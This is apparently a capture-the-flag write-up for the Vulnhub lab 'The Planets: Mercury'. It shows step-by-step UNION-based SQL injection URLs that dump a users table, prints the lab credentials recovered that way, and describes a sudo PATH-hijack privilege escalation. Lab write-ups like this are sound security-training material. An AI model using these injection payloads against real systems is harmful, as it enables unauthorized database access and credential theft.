Vulnhub - THE PLANETS: MERCURY
Introduction
Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash.
This is THE PLANETS: MERCURY from vulnhub.
Ports
This box has SSH on port 22, and HTTP on port 8080. The nmap detail scan says:
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
HTTP
The frontpage just says:
Hello. This site is currently in development please check back later.
And robots.txt disallows the root. Viewing the page source doesn’t give any hints either, but trying to go to a page that doesn’t exist prompts a useful error:
So what can we learn from this? We appear to have a page at mercuryfacts, and the server is running Django (Python), with DEBUG turned on. Let’s look at mercuryfacts.
mercuryfacts
http://192.168.1.116:8080/mercuryfacts/ has a picture of Mercury, along with links to Load a fact and a todo list. The todo list says:
Add CSS.
Implement authentication (using users table)
Use models in django instead of direct mysql call
All the other stuff, so much!!!
So we have MySQL being called directly. Sounds like SQLi.
Facts
The facts page has a URL scheme like so:
http://192.168.1.116:8080/mercuryfacts/2/
Where the number (2 in this case) can be changed to return a new fact. Putting a higher number returns an empty result:
Fact id: 10. ()
Putting something like this:
http://192.168.1.116:8080/mercuryfacts/’%20ORDER%20BY%201–+/
Returns a huge page of debugging information, which is very helpful. Ultimately I did this manually, with these commands:
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(fact)%20from%20facts/
This provided all of the facts, just for interest
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(table_name)%20from%20information_schema.tables/
This provided the database names - information_schema and mercury.
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3D'mercury'/
This provided the table names (we want users).
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%3D'users'/
This provided the column names (username, password).
And finally this provided the data we want:
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(username,':',password)%20from%20mercury.users/
We ended up with four sets of credentials:
john:johnny1987
laura:lovemykids111
sam:lovemybeer111
webmaster:mercuryisthesizeof0.056Earths
SSH
Ultimately only the webmaster credentials work. Enumerating the webmaster directory we find some notes, which we can grab another set of credentials from:
Privesc
We can use these new credentials to su to linuxmaster.
Linuxmaster can run a script called check_syslog.sh as root, while setting an environment variable. The script runs tail without a specified path, so we can create our own tail, make it executable, and then call SETENV to our PWD while running sudo. Here’s what that looks like:
This wasn’t too complicated but I enjoyed it. Thanks SirFlash.